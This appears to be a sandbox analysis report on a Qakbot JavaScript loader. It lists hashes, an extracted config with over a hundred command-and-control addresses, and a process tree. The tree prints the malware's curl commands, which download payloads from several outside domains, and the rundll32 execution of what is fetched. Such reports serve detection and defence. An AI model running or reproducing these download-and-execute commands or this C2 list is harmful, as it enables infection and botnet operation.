Analysis
-
max time kernel
150s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
15/06/2023, 12:39
Static task
static1
Behavioral task
behavioral1
Sample
05929899.js
Resource
win7-20230220-en
General
-
Target
05929899.js
-
Size
464KB
-
MD5
7d5724b6bcbfd42b108e86eaf132062b
-
SHA1
add4aeb0182ac8dd2d9133275a42dd9df8a8b70c
-
SHA256
65efebe64ba9165d4c981c2d32d83f98848d84085cd6721e74c0954dbc553bf7
-
SHA512
f0ea4b12e7826d8e5d90acb2911883f8e6a88577d08a6c09b569f8740d1ba4a8e7128e83fa3a3d802642817aecac14fc4e40315fe811025f0b561a2ca97c5c01
-
SSDEEP
6144:LmFamddP19SiU+g9ITla9MGNs9yec26VZU6BboaI7CRY7kkh9:oLU3+gPZUW0d
Malware Config
Extracted
qakbot
404.1374
obama268
1686733312
125.99.76.102:443
80.12.88.148:2222
109.149.147.195:2222
27.99.32.26:2222
70.28.50.223:3389
70.28.50.223:32100
86.97.96.62:2222
66.241.183.99:443
74.12.146.45:2222
190.199.147.209:2222
47.205.25.170:443
12.172.173.82:993
12.172.173.82:22
84.35.26.14:995
72.134.124.16:443
85.240.173.251:2078
50.68.186.195:443
65.190.242.244:443
45.62.75.217:443
203.109.44.236:995
174.58.146.57:443
105.184.159.9:995
94.207.115.105:443
197.0.146.211:443
197.204.11.218:443
92.9.45.20:2222
91.169.12.198:32100
12.172.173.82:20
70.64.77.115:443
71.31.9.49:995
24.234.220.88:990
95.45.50.93:2222
213.91.235.146:443
189.223.184.79:443
213.64.33.92:2222
47.34.30.133:443
70.28.50.223:2087
12.172.173.82:465
67.219.197.94:443
103.140.174.20:2222
12.172.173.82:995
90.29.86.138:2222
37.14.229.220:2222
89.181.227.42:2222
62.35.230.21:995
70.160.67.203:443
88.126.94.4:50000
203.219.204.180:443
147.219.4.194:443
92.20.204.198:2222
24.234.220.88:993
188.28.19.84:443
89.115.200.234:443
67.87.119.216:2083
86.98.222.20:443
161.142.100.114:995
103.139.242.6:443
103.123.223.153:443
24.234.220.88:995
102.158.231.164:443
175.156.65.126:2222
41.227.190.59:443
178.175.187.254:443
180.151.13.23:2078
12.172.173.82:50001
116.75.63.143:443
74.12.146.45:2083
78.192.109.105:2222
37.186.55.8:2222
121.121.100.202:995
104.35.24.154:443
199.27.66.213:443
181.165.19.254:443
81.229.117.95:2222
12.172.173.82:21
45.2.61.134:3389
162.248.14.107:443
103.212.19.254:995
2.82.8.80:443
103.144.201.63:2078
114.143.176.237:443
103.113.68.33:443
77.126.99.230:443
47.21.51.138:443
197.86.195.10:443
36.152.128.2:2222
12.172.173.82:32101
86.248.228.57:2078
92.149.250.113:2222
70.28.50.223:1194
82.127.153.75:2222
78.159.145.7:995
82.125.44.236:2222
24.234.220.88:465
64.121.161.102:443
187.199.244.117:32103
122.184.143.86:443
79.168.224.165:2222
65.30.139.145:995
151.62.174.154:443
124.122.47.148:443
31.190.240.11:443
92.239.81.124:443
31.53.29.210:2222
172.115.17.50:443
70.28.50.223:2083
124.149.143.189:2222
176.142.207.63:443
201.244.108.183:995
47.199.241.39:443
98.4.43.111:443
91.68.227.219:443
89.129.109.27:2222
67.87.119.216:2078
86.195.14.72:2222
72.205.104.134:443
1.221.179.74:443
58.162.223.233:443
49.175.72.81:443
Signatures
-
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation wscript.exe -
Loads dropped DLL 1 IoCs
pid Process 3988 rundll32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Delays execution with timeout.exe 1 IoCs
pid Process 2256 timeout.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3988 rundll32.exe 3988 rundll32.exe 3300 wermgr.exe 3300 wermgr.exe 3300 wermgr.exe 3300 wermgr.exe 3300 wermgr.exe 3300 wermgr.exe 3300 wermgr.exe 3300 wermgr.exe 3300 wermgr.exe 3300 wermgr.exe 3300 wermgr.exe 3300 wermgr.exe 3300 wermgr.exe 3300 wermgr.exe 3300 wermgr.exe 3300 wermgr.exe 3300 wermgr.exe 3300 wermgr.exe 3300 wermgr.exe 3300 wermgr.exe 3300 wermgr.exe 3300 wermgr.exe 3300 wermgr.exe 3300 wermgr.exe 3300 wermgr.exe 3300 wermgr.exe 3300 wermgr.exe 3300 wermgr.exe 3300 wermgr.exe 3300 wermgr.exe 3300 wermgr.exe 3300 wermgr.exe 3300 wermgr.exe 3300 wermgr.exe 3300 wermgr.exe 3300 wermgr.exe 3300 wermgr.exe 3300 wermgr.exe 3300 wermgr.exe 3300 wermgr.exe 3300 wermgr.exe 3300 wermgr.exe 3300 wermgr.exe 3300 wermgr.exe 3300 wermgr.exe 3300 wermgr.exe 3300 wermgr.exe 3300 wermgr.exe 3300 wermgr.exe 3300 wermgr.exe 3300 wermgr.exe 3300 wermgr.exe 3300 wermgr.exe 3300 wermgr.exe 3300 wermgr.exe 3300 wermgr.exe 3300 wermgr.exe 3300 wermgr.exe 3300 wermgr.exe 3300 wermgr.exe 3300 wermgr.exe 3300 wermgr.exe -
Suspicious use of WriteProcessMemory 39 IoCs
description pid Process procid_target PID 2704 wrote to memory of 4964 2704 wscript.exe 92 PID 2704 wrote to memory of 4964 2704 wscript.exe 92 PID 2704 wrote to memory of 3804 2704 wscript.exe 94 PID 2704 wrote to memory of 3804 2704 wscript.exe 94 PID 2704 wrote to memory of 2128 2704 wscript.exe 96 PID 2704 wrote to memory of 2128 2704 wscript.exe 96 PID 2704 wrote to memory of 5016 2704 wscript.exe 98 PID 2704 wrote to memory of 5016 2704 wscript.exe 98 PID 2704 wrote to memory of 4736 2704 wscript.exe 100 PID 2704 wrote to memory of 4736 2704 wscript.exe 100 PID 2704 wrote to memory of 980 2704 wscript.exe 102 PID 2704 wrote to memory of 980 2704 wscript.exe 102 PID 2704 wrote to memory of 1768 2704 wscript.exe 103 PID 2704 wrote to memory of 1768 2704 wscript.exe 103 PID 4964 wrote to memory of 4496 4964 cmd.exe 106 PID 4964 wrote to memory of 4496 4964 cmd.exe 106 PID 5016 wrote to memory of 3372 5016 cmd.exe 107 PID 5016 wrote to memory of 3372 5016 cmd.exe 107 PID 980 wrote to memory of 3396 980 cmd.exe 108 PID 980 wrote to memory of 3396 980 cmd.exe 108 PID 2128 wrote to memory of 1272 2128 cmd.exe 110 PID 2128 wrote to memory of 1272 2128 cmd.exe 110 PID 3804 wrote to memory of 2508 3804 cmd.exe 109 PID 3804 wrote to memory of 2508 3804 cmd.exe 109 PID 4736 wrote to memory of 4904 4736 cmd.exe 112 PID 4736 wrote to memory of 4904 4736 cmd.exe 112 PID 1768 wrote to memory of 2256 1768 cmd.exe 111 PID 1768 wrote to memory of 2256 1768 cmd.exe 111 PID 1768 wrote to memory of 2064 1768 cmd.exe 113 PID 1768 wrote to memory of 2064 1768 cmd.exe 113 PID 2064 wrote to memory of 3988 2064 rundll32.exe 114 PID 2064 wrote to memory of 3988 2064 rundll32.exe 114 PID 2064 wrote to memory of 3988 2064 rundll32.exe 114 PID 3988 wrote to memory of 3300 3988 rundll32.exe 115 PID 3988 wrote to memory of 3300 3988 rundll32.exe 115 PID 3988 wrote to memory of 3300 3988 rundll32.exe 115 PID 3988 wrote to memory of 3300 3988 rundll32.exe 115 PID 3988 wrote to memory of 3300 3988 rundll32.exe 115 PID 3988 wrote to memory of 3300 3988 rundll32.exe 115
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\05929899.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2704 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c mkdir C:\Koltes\Fertiol & curl https://rapiska.com/0.7813790639142011.dat --output C:\Koltes\Fertiol\Floster.OOOOCCCCCXXXXX2⤵
- Suspicious use of WriteProcessMemory
PID:4964 -
C:\Windows\system32\curl.execurl https://rapiska.com/0.7813790639142011.dat --output C:\Koltes\Fertiol\Floster.OOOOCCCCCXXXXX3⤵PID:4496
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c mkdir C:\Koltes\Fertiol & curl https://tamimak.com/0.17287429721614433.dat --output C:\Koltes\Fertiol\Floster.OOOOCCCCCXXXXX2⤵
- Suspicious use of WriteProcessMemory
PID:3804 -
C:\Windows\system32\curl.execurl https://tamimak.com/0.17287429721614433.dat --output C:\Koltes\Fertiol\Floster.OOOOCCCCCXXXXX3⤵PID:2508
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c mkdir C:\Koltes\Fertiol & curl https://corfinka.com/0.5034326869937886.dat --output C:\Koltes\Fertiol\Floster.OOOOCCCCCXXXXX2⤵
- Suspicious use of WriteProcessMemory
PID:2128 -
C:\Windows\system32\curl.execurl https://corfinka.com/0.5034326869937886.dat --output C:\Koltes\Fertiol\Floster.OOOOCCCCCXXXXX3⤵PID:1272
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c mkdir C:\Koltes\Fertiol & curl https://qderika.com/0.14684990063874637.dat --output C:\Koltes\Fertiol\Floster.OOOOCCCCCXXXXX2⤵
- Suspicious use of WriteProcessMemory
PID:5016 -
C:\Windows\system32\curl.execurl https://qderika.com/0.14684990063874637.dat --output C:\Koltes\Fertiol\Floster.OOOOCCCCCXXXXX3⤵PID:3372
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c mkdir C:\Koltes\Fertiol & curl https://bilaska.com/0.7719120186347061.dat --output C:\Koltes\Fertiol\Floster.OOOOCCCCCXXXXX2⤵
- Suspicious use of WriteProcessMemory
PID:4736 -
C:\Windows\system32\curl.execurl https://bilaska.com/0.7719120186347061.dat --output C:\Koltes\Fertiol\Floster.OOOOCCCCCXXXXX3⤵PID:4904
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c mkdir C:\Koltes\Fertiol & curl https://nirause.com/0.06605273887576801.dat --output C:\Koltes\Fertiol\Floster.OOOOCCCCCXXXXX2⤵
- Suspicious use of WriteProcessMemory
PID:980 -
C:\Windows\system32\curl.execurl https://nirause.com/0.06605273887576801.dat --output C:\Koltes\Fertiol\Floster.OOOOCCCCCXXXXX3⤵PID:3396
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout 10 & rundll32 C:\Koltes\Fertiol\Floster.OOOOCCCCCXXXXX,must2⤵
- Suspicious use of WriteProcessMemory
PID:1768 -
C:\Windows\system32\timeout.exetimeout 103⤵
- Delays execution with timeout.exe
PID:2256
-
-
C:\Windows\system32\rundll32.exerundll32 C:\Koltes\Fertiol\Floster.OOOOCCCCCXXXXX,must3⤵
- Suspicious use of WriteProcessMemory
PID:2064 -
C:\Windows\SysWOW64\rundll32.exerundll32 C:\Koltes\Fertiol\Floster.OOOOCCCCCXXXXX,must4⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3988 -
C:\Windows\SysWOW64\wermgr.exeC:\Windows\SysWOW64\wermgr.exe5⤵
- Suspicious behavior: EnumeratesProcesses
PID:3300
-
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
12KB
MD52313a8e859366ccf938d9673a3e5d0bd
SHA194fa9d26dda046c753c89df51eec21e681b7e516
SHA256cb2ab390ffd1a923008f95abaf34fd8c5ff186264e925ec32ef3616780b81060
SHA5124400692bb7b6e2dd4b36ea1c8e37ec8ae9a9cfa6c2b541990afdb36a86b2bc30b8900a13c5a757781b7a79cdd6f6b5170ac7968746d9fb90fdaf10c245de9474
-
Filesize
28KB
MD5630f9a72692810a09c496e4c474f0e67
SHA1019149c1463b3391dccd87dfca61e59eb440b3ef
SHA256a16847ad38b3fe738ac6bbaabeb0965e44f406bb9ded6455043e9a0d8eb97180
SHA5129874a9ccac847107b9cff5c80b101940aedbb5f8ee0371c7245988bbbbca5f71d87a2e1c05b3873a4971319b9f961798085c08005ae08eb359eb4bae547f3786
-
Filesize
12KB
MD52313a8e859366ccf938d9673a3e5d0bd
SHA194fa9d26dda046c753c89df51eec21e681b7e516
SHA256cb2ab390ffd1a923008f95abaf34fd8c5ff186264e925ec32ef3616780b81060
SHA5124400692bb7b6e2dd4b36ea1c8e37ec8ae9a9cfa6c2b541990afdb36a86b2bc30b8900a13c5a757781b7a79cdd6f6b5170ac7968746d9fb90fdaf10c245de9474
-
Filesize
12KB
MD52313a8e859366ccf938d9673a3e5d0bd
SHA194fa9d26dda046c753c89df51eec21e681b7e516
SHA256cb2ab390ffd1a923008f95abaf34fd8c5ff186264e925ec32ef3616780b81060
SHA5124400692bb7b6e2dd4b36ea1c8e37ec8ae9a9cfa6c2b541990afdb36a86b2bc30b8900a13c5a757781b7a79cdd6f6b5170ac7968746d9fb90fdaf10c245de9474
-
Filesize
12KB
MD52313a8e859366ccf938d9673a3e5d0bd
SHA194fa9d26dda046c753c89df51eec21e681b7e516
SHA256cb2ab390ffd1a923008f95abaf34fd8c5ff186264e925ec32ef3616780b81060
SHA5124400692bb7b6e2dd4b36ea1c8e37ec8ae9a9cfa6c2b541990afdb36a86b2bc30b8900a13c5a757781b7a79cdd6f6b5170ac7968746d9fb90fdaf10c245de9474
-
Filesize
246KB
MD551f13c77e88b1654394d86ca23ea080b
SHA1a4a48bba578c96cc7695377a190729de48eab5bf
SHA25681e7fb4c88964d8b5a4200fdf1fb8c233b2903f2401cecd82696d163c0fd10ec
SHA512c614a03dfa6db1a192f9e69b181623b80cf0d5a827ef80f82524ab5dbe25dd6d86dcf9b4dff5e4e7970ee3d8316afe58363841bcd4e12b3f9c0ce37f2536c79e
-
Filesize
246KB
MD5bd24ab70fe7a82f22db22fe2b52db5d2
SHA1443603dde22de48532ac2c26421d9f6bdb8dedc0
SHA2564df4360ff47f3afcf8e78b05b4438b6edb8b00365e0b515e60bb905233e396e4
SHA512a8307b7651b76dea7420038a9f38c4cb63bf16a9b3249181c8ee818d7ba0cbbd25daa1fbc25569967503edf3042c7f6ef63ca01992182501fd9a10cc42941255
-
Filesize
246KB
MD5bd24ab70fe7a82f22db22fe2b52db5d2
SHA1443603dde22de48532ac2c26421d9f6bdb8dedc0
SHA2564df4360ff47f3afcf8e78b05b4438b6edb8b00365e0b515e60bb905233e396e4
SHA512a8307b7651b76dea7420038a9f38c4cb63bf16a9b3249181c8ee818d7ba0cbbd25daa1fbc25569967503edf3042c7f6ef63ca01992182501fd9a10cc42941255